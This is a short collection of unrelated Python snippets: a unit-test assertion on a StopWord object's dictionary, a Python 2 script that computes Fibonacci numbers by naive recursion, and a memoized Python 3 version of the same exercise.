s = StopWord(word='test')
self.assertEqual(s.get_stopword_dict(), {'id': s.id, 'user': '', 'query': '', 'word': s.word})
|
# -*- coding: utf-8 -*-
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
def ex3():
testlist = []
n = int(raw_input())
for i in range(0, n+1):
testlist.append(fibo(i))
print testlist[n]
def fibo(n):
if n == 0:
return 0
elif n == 1:
return 1
else:
return fibo(n-2) + fibo(n-1)
if __name__ == '__main__':
ex3()
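# For comparison, a Python 3 sketch of the same exercise (an addition, not part
# of the original script): functools.lru_cache memoizes fibo, avoiding the
# exponential recomputation of the naive recursion above.
from functools import lru_cache

@lru_cache(maxsize=None)
def fibo_py3(n):
    return n if n < 2 else fibo_py3(n - 2) + fibo_py3(n - 1)

def ex3_py3():
    n = int(input())
    print(fibo_py3(n))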
|